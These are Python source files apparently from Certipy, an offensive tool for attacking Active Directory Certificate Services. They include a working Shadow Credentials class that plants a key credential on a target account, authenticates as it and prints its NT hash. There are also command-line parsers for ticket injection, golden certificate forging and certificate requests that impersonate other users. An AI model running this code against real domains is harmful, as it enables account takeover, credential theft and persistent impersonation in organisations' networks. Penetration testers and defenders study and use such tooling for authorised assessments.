            "objectSid",
        ]
        # Only request msDS-GroupMSAMembership when it exists in the schema. Else the ldap3 module will return an LDAPAttributeError error.
        if self.ldap_conn.server.schema and "msDS-GroupMSAMembership" in self.ldap_conn.server.schema.attribute_types:
            attributes.append("msDS-GroupMSAMembership")
        results = self.search(
            "(objectSid=%s)" % sid,
            attributes=attributes,
        )

        if len(results) != 1:
            logging.warning("Failed to lookup user with SID %s" % repr(sid))
            entry = LDAPEntry(
                **{
                    "attributes": {
                        "objectSid": sid,
                        "name": sid,
                        "objectType": "Base",
                    }
                }
            )
        else:
            entry = results[0]
            entry.set("name", "%s\\%s" % (self.domain, entry.get("name")))
            entry.set("objectType", get_account_type(entry))

        self.sid_map[sid] = entry

        return entry



import argparse
from typing import List, Tuple

import ldap3
import OpenSSL
from dsinternals.common.cryptography.X509Certificate2 import X509Certificate2
from dsinternals.common.data.DNWithBinary import DNWithBinary
from dsinternals.common.data.hello.KeyCredential import KeyCredential
from dsinternals.system.DateTime import DateTime
from dsinternals.system.Guid import Guid

from certipy.lib.certificate import create_pfx, der_to_cert, der_to_key, rsa, x509
from certipy.lib.ldap import LDAPConnection, LDAPEntry
from certipy.lib.logger import logging
from certipy.lib.target import Target

from .auth import Authenticate


class Shadow:
    def __init__(
        self,
        target: Target,
        account: str,
        device_id: str = None,
        out: str = None,
        scheme: str = "ldaps",
        connection: LDAPConnection = None,
        debug=False,
        **kwargs
    ):
        self.target = target
        self.account = account
        self.device_id = device_id
        self.out = out
        self.scheme = scheme
        self.verbose = debug
        self.kwargs = kwargs

        self._connection = connection

    @property
    def connection(self) -> LDAPConnection:
        if self._connection is not None:
            return self._connection

        self._connection = LDAPConnection(self.target, self.scheme)
        self._connection.connect()

        return self._connection

    def get_key_credentials(self, target_dn: str, user: LDAPEntry) -> List[bytes]:
        results = self.connection.search(
            search_base=target_dn,
            search_filter="(objectClass=*)",
            attributes=["SAMAccountName", "objectSid", "msDS-KeyCredentialLink"],
        )

        if len(results) == 0:
            logging.error(
                "Could not get the Key Credentials for %s"
                % repr(user.get("sAMAccountName"))
            )
            return None

        result = results[0]

        return result.get_raw("msDS-KeyCredentialLink")

    def set_key_credentials(
        self, target_dn: str, user: LDAPEntry, key_credential: List[bytes]
    ):
        result = self.connection.modify(
            target_dn,
            {"msDS-KeyCredentialLink": [ldap3.MODIFY_REPLACE, key_credential]},
        )

        if result["result"] == 0:
            return True
        elif result["result"] == 50:
            logging.error(
                "Could not update Key Credentials for %s due to insufficient access rights: %s"
                % (repr(user.get("sAMAccountName")), result["message"])
            )
            return False
        elif result["result"] == 19:
            logging.error(
                "Could not update Key Credentials for %s due to a constraint violation: %s"
                % (repr(user.get("sAMAccountName")), result["message"])
            )
        else:
            logging.error(
                "Failed to update the Key Credentials for %s: %s"
                % (repr(user.get("sAMAccountName")), result["message"])
            )
        return False

    def generate_key_credential(
        self, target_dn: str, subject: str
    ) -> Tuple[X509Certificate2, KeyCredential, str]:
        logging.info("Generating certificate")

        if len(subject) >= 64:
            logging.warning("Subject too long. Limiting subject to 64 characters.")
            subject = subject[:64]

        cert = X509Certificate2(
            subject=subject,
            keySize=2048,
            notBefore=(-40 * 365),
            notAfter=(40 * 365),
        )
        logging.info("Certificate generated")

        logging.info("Generating Key Credential")
        key_credential = KeyCredential.fromX509Certificate2(
            certificate=cert,
            deviceId=Guid(),
            owner=target_dn,
            currentTime=DateTime(),
        )

        device_id = key_credential.DeviceId.toFormatD()
        logging.info("Key Credential generated with DeviceID %s" % repr(device_id))

        return (cert, key_credential, device_id)

    def add_new_key_credential(
        self, target_dn: str, user: LDAPEntry
    ) -> Tuple[X509Certificate2, KeyCredential, List[bytes], str]:
        cert, key_credential, device_id = self.generate_key_credential(
            target_dn, "CN=%s" % user.get("sAMAccountName")
        )

        if self.verbose:
            key_credential.fromDNWithBinary(key_credential.toDNWithBinary()).show()
        logging.debug("Key Credential: %s" % key_credential.toDNWithBinary().toString())

        saved_key_credential = self.get_key_credentials(target_dn, user)

        if saved_key_credential is None:
            return None

        new_key_credential = saved_key_credential + [
            key_credential.toDNWithBinary().toString()
        ]

        logging.info(
            "Adding Key Credential with device ID %s to the Key Credentials for %s"
            % (repr(device_id), repr(user.get("sAMAccountName")))
        )

        result = self.set_key_credentials(target_dn, user, new_key_credential)

        if result is False:
            return None

        logging.info(
            "Successfully added Key Credential with device ID %s to the Key Credentials for %s"
            % (repr(device_id), repr(user.get("sAMAccountName")))
        )

        return (cert, new_key_credential, saved_key_credential, device_id)

    def get_key_and_certificate(
        self, cert: X509Certificate2
    ) -> Tuple[rsa.RSAPrivateKey, x509.Certificate]:
        key = der_to_key(
            OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_ASN1, cert.key)
        )
        cert = der_to_cert(
            OpenSSL.crypto.dump_certificate(
                OpenSSL.crypto.FILETYPE_ASN1, cert.certificate
            )
        )

        return (key, cert)

    def auto(self):
        user = self.connection.get_user(self.account)
        if user is None:
            return False

        logging.info("Targeting user %s" % repr(user.get("sAMAccountName")))

        target_dn = user.get("distinguishedName")

        result = self.add_new_key_credential(target_dn, user)
        if result is None:
            return False

        cert, _, saved_key_credential, _ = result

        key, cert = self.get_key_and_certificate(cert)

        logging.info(
            "Authenticating as %s with the certificate"
            % (repr(user.get("sAMAccountName")))
        )

        authenticate = Authenticate(self.target, cert=cert, key=key)
        authenticate.authenticate(
            username=user.get("sAMAccountName"), is_key_credential=True
        )

        logging.info(
            "Restoring the old Key Credentials for %s"
            % repr(user.get("sAMAccountName"))
        )

        result = self.set_key_credentials(target_dn, user, saved_key_credential)

        if result is True:
            logging.info(
                "Successfully restored the old Key Credentials for %s"
                % repr(user.get("sAMAccountName"))
            )

        logging.info(
            "NT hash for %s: %s"
            % (repr(user.get("sAMAccountName")), authenticate.nt_hash)
        )

        return authenticate.nt_hash

    def add(self):
        user = self.connection.get_user(self.account)
        if user is None:
            return False

        logging.info("Targeting user %s" % repr(user.get("sAMAccountName")))

        target_dn = user.get("distinguishedName")

        result = self.add_new_key_credential(target_dn, user)
        if result is None:
            return False

        cert, _, _, device_id = result

        key, cert = self.get_key_and_certificate(cert)

        out = self.out
        if out is None:
            out = "%s.pfx" % user.get("sAMAccountName").rstrip("$")

        pfx = create_pfx(key, cert)

        with open(out, "wb") as f:
            f.write(pfx)

        logging.info("Saved certificate and private key to %s" % repr(out))

    def list(self):
        user = self.connection.get_user(self.account)
        if user is None:
            return False

        logging.info("Targeting user %s" % repr(user.get("sAMAccountName")))

        target_dn = user.get("distinguishedName")

        key_credentials = self.get_key_credentials(target_dn, user)
        if key_credentials is None:
            return False

        if len(key_credentials) == 0:
            logging.info(
                "The Key Credentials attribute for %s is either empty or the current user does not have read permissions for the attribute"
                % repr(user.get("sAMAccountName"))
            )
            return True

        logging.info(
            "Listing Key Credentials for %s" % repr(user.get("sAMAccountName"))
        )
        for dn_binary_value in key_credentials:
            key_credential = KeyCredential.fromDNWithBinary(
                DNWithBinary.fromRawDNWithBinary(dn_binary_value)
            )

            logging.info(
                "DeviceID: %s | Creation Time (UTC): %s"
                % (
                    key_credential.DeviceId.toFormatD(),
                    key_credential.CreationTime,
                )
            )

    def clear(self):
        user = self.connection.get_user(self.account)
        if user is None:
            return False

        logging.info("Targeting user %s" % repr(user.get("sAMAccountName")))

        target_dn = user.get("distinguishedName")

        logging.info(
            "Clearing the Key Credentials for %s" % repr(user.get("sAMAccountName"))
        )

        result = self.set_key_credentials(target_dn, user, [])

        if result is True:
            logging.info(
                "Successfully cleared the Key Credentials for %s"
                % repr(user.get("sAMAccountName"))
            )

        return result

    def remove(self):
        if self.device_id is None:
            logging.error(
                "A device ID (-device-id) is required for the remove operation"
            )
            return False

        user = self.connection.get_user(self.account)
        if user is None:
            return False

        logging.info("Targeting user %s" % repr(user.get("sAMAccountName")))

        target_dn = user.get("distinguishedName")

        key_credentials = self.get_key_credentials(target_dn, user)
        if key_credentials is None:
            return False

        if len(key_credentials) == 0:
            logging.info(
                "The Key Credentials attribute for %s is either empty or the current user does not have read permissions for the attribute"
                % repr(user.get("sAMAccountName"))
            )
            return True

        device_id = self.device_id
        new_key_credentials = []
        device_id_in_current_values = False
        for dn_binary_value in key_credentials:
            key_credential = KeyCredential.fromDNWithBinary(
                DNWithBinary.fromRawDNWithBinary(dn_binary_value)
            )
            if key_credential.DeviceId.toFormatD() == device_id:
                logging.info(
                    "Found device ID %s in Key Credentials %s"
                    % (repr(device_id), repr(user.get("sAMAccountName")))
                )
                device_id_in_current_values = True
            else:
                new_key_credentials.append(dn_binary_value)

        if device_id_in_current_values is True:
            logging.info(
                "Deleting the Key Credential with device ID %s in Key Credentials for %s"
                % (repr(device_id), repr(user.get("sAMAccountName")))
            )

            result = self.set_key_credentials(target_dn, user, new_key_credentials)

            if result is True:
                logging.info(
                    "Successfully deleted the Key Credential with device ID %s in Key Credentials for %s"
                    % (repr(device_id), repr(user.get("sAMAccountName")))
                )
            return result
        else:
            logging.error(
                "Could not find device ID %s in Key Credentials for %s"
                % (repr(device_id), repr(user.get("sAMAccountName")))
            )
            return False

    def info(self):
        if self.device_id is None:
            logging.error("A device ID (-device-id) is required for the info operation")
            return False

        user = self.connection.get_user(self.account)
        if user is None:
            return False

        logging.info("Targeting user %s" % repr(user.get("sAMAccountName")))

        target_dn = user.get("distinguishedName")

        key_credentials = self.get_key_credentials(target_dn, user)
        if key_credentials is None:
            return False

        if len(key_credentials) == 0:
            logging.info(
                "The Key Credentials attribute for %s is either empty or the current user does not have read permissions for the attribute"
                % repr(user.get("sAMAccountName"))
            )
            return True

        device_id = self.device_id

        for dn_binary_value in key_credentials:
            key_credential = KeyCredential.fromDNWithBinary(
                DNWithBinary.fromRawDNWithBinary(dn_binary_value)
            )
            if key_credential.DeviceId.toFormatD() == device_id:
                logging.info(
                    "Found device ID %s in Key Credentials %s"
                    % (repr(device_id), repr(user.get("sAMAccountName")))
                )
                key_credential.show()
                return True

        logging.error(
            "Could not find device ID %s in Key Credentials for %s"
            % (repr(device_id), repr(user.get("sAMAccountName")))
        )
        return False


def entry(options: argparse.Namespace) -> None:
    target = Target.from_options(options)

    account = options.account
    if account is None:
        account = target.username

    del options.account
    del options.target
    shadow = Shadow(target=target, account=account, **vars(options))

    actions = {
        "auto": shadow.auto,
        "add": shadow.add,
        "list": shadow.list,
        "clear": shadow.clear,
        "remove": shadow.remove,
        "info": shadow.info,
    }

    actions[options.shadow_action]()



NAME = "ptt"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import ptt

    ptt.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Inject TGT for SSPI authentication")
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("ticket options")
    group.add_argument("-ticket", action="store", metavar="base64 kirbi/ccache")
    group.add_argument(
        "-ticket-file",
        action="store",
        metavar="kirbi/ccache ticket file (optionally base64 encoded)",
    )
    group.add_argument("-req", action="store_true", help="Request new TGT")

    target.add_argument_group(subparser, connection_options=None)

    return NAME, entry



NAME = "forge"

import argparse
from typing import Callable, Tuple


def entry(options: argparse.Namespace):
    from certipy.commands import forge

    forge.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Create Golden Certificates")

    subparser.add_argument(
        "-ca-pfx",
        action="store",
        metavar="pfx/p12 file name",
        help="Path to CA certificate",
        required=True,
    )
    subparser.add_argument("-upn", action="store", metavar="alternative UPN")
    subparser.add_argument("-dns", action="store", metavar="alternative DNS")
    subparser.add_argument("-sid", action="store", metavar="alternative Object SID")
    subparser.add_argument(
        "-template",
        action="store",
        metavar="pfx/p12 file name",
        help="Path to template certificate",
    )
    subparser.add_argument(
        "-subject",
        action="store",
        metavar="subject",
        help="Subject to include certificate",
    )
    subparser.add_argument(
        "-issuer",
        action="store",
        metavar="issuer",
        help="Issuer to include certificate. If not specified, the issuer from the CA cert will be used",
    )
    subparser.add_argument(
        "-crl",
        action="store",
        metavar="ldap path",
        help="ldap path to a CRL",
    )
    subparser.add_argument("-serial", action="store", metavar="serial number")
    subparser.add_argument(
        "-key-size",
        action="store",
        metavar="RSA key length",
        help="Length of RSA key. Default: 2048",
        default=2048,
        type=int,
    )
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    group = subparser.add_argument_group("output options")
    group.add_argument("-out", action="store", metavar="output file name")

    return NAME, entry



import argparse
import logging
import sys
import traceback

from certipy import version
from certipy.commands.parsers import ENTRY_PARSERS
from certipy.lib import logger


def main() -> None:
    logger.init()

    print(version.BANNER, file=sys.stderr)

    for arg in sys.argv:
        if arg.lower() in ["--version", "-v", "-version"]:
            return

    parser = argparse.ArgumentParser(
        add_help=False,
        description="Active Directory Certificate Services enumeration and abuse",
    )

    parser.add_argument(
        "-v",
        "--version",
        action="store_true",
        help="Show Certipy's version number and exit",
        default=argparse.SUPPRESS,
    )
    parser.add_argument(
        "-h",
        "--help",
        action="help",
        default=argparse.SUPPRESS,
        help="Show this help message and exit",
    )

    subparsers = parser.add_subparsers(help="Action", dest="action", required=True)

    actions = {}

    for entry_parser in ENTRY_PARSERS:
        action, entry = entry_parser.add_subparser(subparsers)
        actions[action] = entry

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    if options.debug is True:
        logger.logging.setLevel(logging.DEBUG)
    else:
        logger.logging.setLevel(logging.INFO)

    try:
        actions[options.action](options)
    except Exception as e:
        logger.logging.error("Got error: %s" % e)
        if options.debug:
            traceback.print_exc()
        else:
            logger.logging.error("Use -debug to print a stacktrace")


if __name__ == "__main__":
    main()



NAME = "req"

import argparse
from typing import Callable, Tuple

from . import target


def entry(options: argparse.Namespace):
    from certipy.commands import req

    req.entry(options)


def add_subparser(subparsers: argparse._SubParsersAction) -> Tuple[str, Callable]:
    subparser = subparsers.add_parser(NAME, help="Request certificates")
    subparser.add_argument("-debug", action="store_true", help="Turn debug output on")

    subparser.add_argument(
        "-ca", action="store", metavar="certificate authority name", required=True
    )

    group = subparser.add_argument_group("certificate request options")
    group.add_argument(
        "-template", action="store", metavar="template name", default="User"
    )
    group.add_argument("-upn", action="store", metavar="alternative UPN")
    group.add_argument("-dns", action="store", metavar="alternative DNS")
    group.add_argument("-sid", action="store", metavar="alternative Object SID")
    group.add_argument(
        "-subject",
        action="store",
        metavar="subject",
        help="Subject to include certificate, e.g. CN=Administrator,CN=Users,DC=CORP,DC=LOCAL",
    )
    group.add_argument(
        "-retrieve",
        action="store",
        metavar="request ID",
        help="Retrieve an issued certificate specified by a request ID instead of requesting a new certificate",
        default=0,
        type=int,
    )
    group.add_argument(
        "-on-behalf-of",
        action="store",
        metavar="domain\\account",
        help="Use a Certificate Request Agent certificate to request on behalf of another user",
    )
    group.add_argument(
        "-pfx",
        action="store",
        metavar="pfx/p12 file name",
        help="Path to PFX for -on-behalf-of or -renew",
    )
    group.add_argument(
        "-key-size",
        action="store",
        metavar="RSA key length",
        help="Length of RSA key. Default: 2048",
        default=2048,
        type=int,
    )
    group.add_argument(
        "-archive-key",
        action="store_true",
        help="Send private key for Key Archival",
    )
    group.add_argument(
        "-renew",
        action="store_true",
        help="Create renewal request",
    )

    group = subparser.add_argument_group("output options")
    group.add_argument("-out", action="store", metavar="output file name")

    connection_group = subparser.add_argument_group("connection options")
    connection_group.add_argument(
        "-web",
        action="store_true",
        help="Use Web Enrollment instead of RPC",
    )

    group = subparser.add_argument_group("rpc connection options")
    group.add_argument(
        "-dynamic-endpoint",
        action="store_true",
        help="Prefer dynamic TCP endpoint over named pipe",
    )

    group = subparser.add_argument_group("http connection options")
    group.add_argument(
        "-scheme",
        action="store",
        metavar="http scheme",
        choices=["http", "https"],
        default="http",
    )
    group.add_argument(
        "-port",
        action="store",
        help="Web Enrollment port. If omitted, port 80 or 443 will be chosen by default depending on the scheme.",
        type=int,
    )

    target.add_argument_group(subparser, connection_options=connection_group)

    return NAME, entry



import enum

from certipy.lib.structs import IntFlag

# https://github.com/fox-it/BloodHound.py/blob/d665959c58d881900378040e6670fa12f801ccd4/bloodhound/ad/utils.py#L36
WELLKNOWN_SIDS = {
    "S-1-0": ("Null Authority", "USER"),
    "S-1-0-0": ("Nobody", "USER"),
    "S-1-1": ("World Authority", "USER"),
    "S-1-1-0": ("Everyone", "GROUP"),
    "S-1-2": ("Local Authority", "USER"),
    "S-1-2-0": ("Local", "GROUP"),
    "S-1-2-1": ("Console Logon", "GROUP"),
    "S-1-3": ("Creator Authority", "USER"),
    "S-1-3-0": ("Creator Owner", "USER"),
    "S-1-3-1": ("Creator Group", "GROUP"),
    "S-1-3-2": ("Creator Owner Server", "COMPUTER"),
    "S-1-3-3": ("Creator Group Server", "COMPUTER"),
    "S-1-3-4": ("Owner Rights", "GROUP"),
    "S-1-4": ("Non-unique Authority", "USER"),
    "S-1-5": ("NT Authority", "USER"),
    "S-1-5-1": ("Dialup", "GROUP"),
    "S-1-5-2": ("Network", "GROUP"),
    "S-1-5-3": ("Batch", "GROUP"),
    "S-1-5-4": ("Interactive", "GROUP"),
    "S-1-5-6": ("Service", "GROUP"),
    "S-1-5-7": ("Anonymous", "GROUP"),
    "S-1-5-8": ("Proxy", "GROUP"),
    "S-1-5-9": ("Enterprise Domain Controllers", "GROUP"),
    "S-1-5-10": ("Principal Self", "USER"),
    "S-1-5-11": ("Authenticated Users", "GROUP"),
    "S-1-5-12": ("Restricted Code", "GROUP"),
    "S-1-5-13": ("Terminal Server Users", "GROUP"),
    "S-1-5-14": ("Remote Interactive Logon", "GROUP"),
    "S-1-5-15": ("This Organization", "GROUP"),
    "S-1-5-17": ("IUSR", "USER"),
    "S-1-5-18": ("Local System", "USER"),
    "S-1-5-19": ("NT Authority", "USER"),
    "S-1-5-20": ("Network Service", "USER"),
    "S-1-5-80-0": ("All Services ", "GROUP"),
    "S-1-5-32-544": ("Administrators", "GROUP"),
    "S-1-5-32-545": ("Users", "GROUP"),
    "S-1-5-32-546": ("Guests", "GROUP"),
    "S-1-5-32-547": ("Power Users", "GROUP"),
    "S-1-5-32-548": ("Account Operators", "GROUP"),
    "S-1-5-32-549": ("Server Operators", "GROUP"),
    "S-1-5-32-550": ("Print Operators", "GROUP"),
    "S-1-5-32-551": ("Backup Operators", "GROUP"),
    "S-1-5-32-552": ("Replicators", "GROUP"),
    "S-1-5-32-554": ("Pre-Windows 2000 Compatible Access", "GROUP"),
    "S-1-5-32-555": ("Remote Desktop Users", "GROUP"),
    "S-1-5-32-556": ("Network Configuration Operators", "GROUP"),
    "S-1-5-32-557": ("Incoming Forest Trust Builders", "GROUP"),
    "S-1-5-32-558": ("Performance Monitor Users", "GROUP"),
    "S-1-5-32-559": ("Performance Log Users", "GROUP"),
    "S-1-5-32-560": ("Windows Authorization Access Group", "GROUP"),
    "S-1-5-32-561": ("Terminal Server License Servers", "GROUP"),
    "S-1-5-32-562": ("Distributed COM Users", "GROUP"),
    "S-1-5-32-568": ("IIS_IUSRS", "GROUP"),
    "S-1-5-32-569": ("Cryptographic Operators", "GROUP"),
    "S-1-5-32-573": ("Event Log Readers", "GROUP"),
    "S-1-5-32-574": ("Certificate Service DCOM Access", "GROUP"),
    "S-1-5-32-575": ("RDS Remote Access Servers", "GROUP"),
    "S-1-5-32-576": ("RDS Endpoint Servers", "GROUP"),
    "S-1-5-32-577": ("RDS Management Servers", "GROUP"),
    "S-1-5-32-578": ("Hyper-V Administrators", "GROUP"),
    "S-1-5-32-579": ("Access Control Assistance Operators", "GROUP"),
    "S-1-5-32-580": ("Access Control Assistance Operators", "GROUP"),
}


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/1192823c-d839-4bc3-9b6b-fa8c53507ae1
class MS_PKI_CERTIFICATE_NAME_FLAG(IntFlag):
    NONE = 0x00000000
    ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
    ADD_EMAIL = 0x00000002
    ADD_OBJ_GUID = 0x00000004
    OLD_CERT_SUPPLIES_SUBJECT_AND_ALT_NAME = 0x00000008
    ADD_DIRECTORY_PATH = 0x00000100
    ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME = 0x00010000
    SUBJECT_ALT_REQUIRE_DOMAIN_DNS = 0x00400000
    SUBJECT_ALT_REQUIRE_SPN = 0x00800000
    SUBJECT_ALT_REQUIRE_DIRECTORY_GUID = 0x01000000
    SUBJECT_ALT_REQUIRE_UPN = 0x02000000
    SUBJECT_ALT_REQUIRE_EMAIL = 0x04000000
    SUBJECT_ALT_REQUIRE_DNS = 0x08000000
    SUBJECT_REQUIRE_DNS_AS_CN = 0x10000000
    SUBJECT_REQUIRE_EMAIL = 0x20000000
    SUBJECT_REQUIRE_COMMON_NAME = 0x40000000
    SUBJECT_REQUIRE_DIRECTORY_PATH = 0x80000000


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/ec71fd43-61c2-407b-83c9-b52272dec8a1
class MS_PKI_ENROLLMENT_FLAG(IntFlag):
    NONE = 0x00000000
    INCLUDE_SYMMETRIC_ALGORITHMS = 0x00000001
    PEND_ALL_REQUESTS = 0x00000002
    PUBLISH_TO_KRA_CONTAINER = 0x00000004
    PUBLISH_TO_DS = 0x00000008
    AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE = 0x00000010
    AUTO_ENROLLMENT = 0x00000020
    CT_FLAG_DOMAIN_AUTHENTICATION_NOT_REQUIRED = 0x80
    PREVIOUS_APPROVAL_VALIDATE_REENROLLMENT = 0x00000040
    USER_INTERACTION_REQUIRED = 0x00000100
    ADD_TEMPLATE_NAME = 0x200
    REMOVE_INVALID_CERTIFICATE_FROM_PERSONAL_STORE = 0x00000400
    ALLOW_ENROLL_ON_BEHALF_OF = 0x00000800
    ADD_OCSP_NOCHECK = 0x00001000
    ENABLE_KEY_REUSE_ON_NT_TOKEN_KEYSET_STORAGE_FULL = 0x00002000
    NOREVOCATIONINFOINISSUEDCERTS = 0x00004000
    INCLUDE_BASIC_CONSTRAINTS_FOR_EE_CERTS = 0x00008000
    ALLOW_PREVIOUS_APPROVAL_KEYBASEDRENEWAL_VALIDATE_REENROLLMENT = 0x00010000
    ISSUANCE_POLICIES_FROM_REQUEST = 0x00020000
    SKIP_AUTO_RENEWAL = 0x00040000
    NO_SECURITY_EXTENSION = 0x00080000


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/f6122d87-b999-4b92-bff8-f465e8949667
class MS_PKI_PRIVATE_KEY_FLAG(IntFlag):
    REQUIRE_PRIVATE_KEY_ARCHIVAL = 0x00000001
    EXPORTABLE_KEY = 0x00000010
    STRONG_KEY_PROTECTION_REQUIRED = 0x00000020
    REQUIRE_ALTERNATE_SIGNATURE_ALGORITHM = 0x00000040
    REQUIRE_SAME_KEY_RENEWAL = 0x00000080
    USE_LEGACY_PROVIDER = 0x00000100
    ATTEST_NONE = 0x00000000
    ATTEST_REQUIRED = 0x00002000
    ATTEST_PREFERRED = 0x00001000
    ATTESTATION_WITHOUT_POLICY = 0x00004000
    EK_TRUST_ON_USE = 0x00000200
    EK_VALIDATE_CERT = 0x00000400
    EK_VALIDATE_KEY = 0x00000800
    HELLO_LOGON_KEY = 0x00200000


# https://github.com/GhostPack/Certify/blob/2b1530309c0c5eaf41b2505dfd5a68c83403d031/Certify/Domain/CertificateAuthority.cs#L23
class MS_PKI_CERTIFICATE_AUTHORITY_FLAG(IntFlag):
    NO_TEMPLATE_SUPPORT = 0x00000001
    SUPPORTS_NT_AUTHENTICATION = 0x00000002
    CA_SUPPORTS_MANUAL_AUTHENTICATION = 0x00000004
    CA_SERVERTYPE_ADVANCED = 0x00000008


# https://www.pkisolutions.com/object-identifiers-oid-in-pki/
OID_TO_STR_MAP = {
    "1.3.6.1.4.1.311.76.6.1": "Windows Update",
    "1.3.6.1.4.1.311.10.3.11": "Key Recovery",
    "1.3.6.1.4.1.311.10.3.25": "Windows Third Party Application Component",
    "1.3.6.1.4.1.311.21.6": "Key Recovery Agent",
    "1.3.6.1.4.1.311.10.3.6": "Windows System Component Verification",
    "1.3.6.1.4.1.311.61.4.1": "Early Launch Antimalware Drive",
    "1.3.6.1.4.1.311.10.3.23": "Windows TCB Component",
    "1.3.6.1.4.1.311.61.1.1": "Kernel Mode Code Signing",
    "1.3.6.1.4.1.311.10.3.26": "Windows Software Extension Verification",
    "2.23.133.8.3": "Attestation Identity Key Certificate",
    "1.3.6.1.4.1.311.76.3.1": "Windows Store",
    "1.3.6.1.4.1.311.10.6.1": "Key Pack Licenses",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "1.3.6.1.5.2.3.5": "KDC Authentication",
    "1.3.6.1.5.5.7.3.7": "IP security use",
    "1.3.6.1.4.1.311.10.3.8": "Embedded Windows System Component Verification",
    "1.3.6.1.4.1.311.10.3.20": "Windows Kits Component",
    "1.3.6.1.5.5.7.3.6": "IP security tunnel termination",
    "1.3.6.1.4.1.311.10.3.5": "Windows Hardware Driver Verification",
    "1.3.6.1.5.5.8.2.2": "IP security IKE intermediate",
    "1.3.6.1.4.1.311.10.3.39": "Windows Hardware Driver Extended Verification",
    "1.3.6.1.4.1.311.10.6.2": "License Server Verification",
    "1.3.6.1.4.1.311.10.3.5.1": "Windows Hardware Driver Attested Verification",
    "1.3.6.1.4.1.311.76.5.1": "Dynamic Code Generato",
    "1.3.6.1.5.5.7.3.8": "Time Stamping",
    "1.3.6.1.4.1.311.10.3.4.1": "File Recovery",
    "1.3.6.1.4.1.311.2.6.1": "SpcRelaxedPEMarkerCheck",
    "2.23.133.8.1": "Endorsement Key Certificate",
    "1.3.6.1.4.1.311.2.6.2": "SpcEncryptedDigestRetryCount",
    "1.3.6.1.4.1.311.10.3.4": "Encrypting File System",
    "1.3.6.1.5.5.7.3.1": "Server Authentication",
    "1.3.6.1.4.1.311.61.5.1": "HAL Extension",
    "1.3.6.1.5.5.7.3.4": "Secure Email",
    "1.3.6.1.5.5.7.3.5": "IP security end system",
    "1.3.6.1.4.1.311.10.3.9": "Root List Signe",
    "1.3.6.1.4.1.311.10.3.30": "Disallowed List",
    "1.3.6.1.4.1.311.10.3.19": "Revoked List Signe",
    "1.3.6.1.4.1.311.10.3.21": "Windows RT Verification",
    "1.3.6.1.4.1.311.10.3.10": "Qualified Subordination",
    "1.3.6.1.4.1.311.10.3.12": "Document Signing",
    "1.3.6.1.4.1.311.10.3.24": "Protected Process Verification",
    "1.3.6.1.4.1.311.80.1": "Document Encryption",
    "1.3.6.1.4.1.311.10.3.22": "Protected Process Light Verification",
    "1.3.6.1.4.1.311.21.19": "Directory Service Email Replication",
    "1.3.6.1.4.1.311.21.5": "Private Key Archival",
    "1.3.6.1.4.1.311.10.5.1": "Digital Rights",
    "1.3.6.1.4.1.311.10.3.27": "Preview Build Signing",
    "1.3.6.1.4.1.311.20.2.1": "Certificate Request Agent",
    "2.23.133.8.2": "Platform Certificate",
    "1.3.6.1.4.1.311.20.1": "CTL Usage",
    "1.3.6.1.5.5.7.3.9": "OCSP Signing",
    "1.3.6.1.5.5.7.3.3": "Code Signing",
    "1.3.6.1.4.1.311.10.3.1": "Microsoft Trust List Signing",
    "1.3.6.1.4.1.311.10.3.2": "Microsoft Time Stamping",
    "1.3.6.1.4.1.311.76.8.1": "Microsoft Publishe",
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.10.3.13": "Lifetime Signing",
    "2.5.29.37.0": "Any Purpose",
    "1.3.6.1.4.1.311.64.1.1": "Server Trust",
    "1.3.6.1.4.1.311.10.3.7": "OEM Windows System Component Verification",
}


# https://docs.microsoft.com/en-us/dotnet/api/system.security.accesscontrol.accesscontroltype?view=net-5.0
class ACCESS_CONTROL_TYPE(IntFlag):
    ALLOW = 0
    DENY = 1


# https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=net-5.0
class ACTIVE_DIRECTORY_RIGHTS(IntFlag):
    ACCESS_SYSTEM_SECURITY = 16777216
    SYNCHRONIZE = 1048576
    GENERIC_ALL = 983551
    WRITE_OWNER = 524288
    WRITE_DACL = 262144
    GENERIC_READ = 131220
    GENERIC_WRITE = 131112
    GENERIC_EXECUTE = 131076
    READ_CONTROL = 131072
    DELETE = 65536
    EXTENDED_RIGHT = 256
    LIST_OBJECT = 128
    DELETE_TREE = 64
    WRITE_PROPERTY = 32
    READ_PROPERTY = 16
    SELF = 8
    LIST_CHILDREN = 4
    DELETE_CHILD = 2
    CREATE_CHILD = 1

    def to_list(self):
        cls = self.__class__
        members, _ = enum._decompose(cls, self._value_)
        filtered_members = []
        for member in members:
            found = False
            for n in members:
                if n & member and n != member:
                    found = True

            if not found:
                filtered_members.append(member)
        return members


class CERTIFICATE_RIGHTS(IntFlag):
    GENERIC_ALL = 983551
    WRITE_OWNER = 524288
    WRITE_DACL = 262144
    WRITE_PROPERTY = 32

    def to_list(self):
        cls = self.__class__

        if self._value_ == self.GENERIC_ALL:
            return [CERTIFICATE_RIGHTS(self.GENERIC_ALL)]

        members, _ = enum._decompose(cls, self._value_)
        filtered_members = []
        for member in members:
            if str(member) == str(member.value):
                continue
            filtered_members.append(member)
        return filtered_members


# https://github.com/GhostPack/Certify/blob/2b1530309c0c5eaf41b2505dfd5a68c83403d031/Certify/Domain/CertificateAuthority.cs#L11
class CERTIFICATION_AUTHORITY_RIGHTS(IntFlag):
    MANAGE_CA = 1
    MANAGE_CERTIFICATES = 2
    AUDITOR = 4
    OPERATOR = 8
    READ = 256
    ENROLL = 512


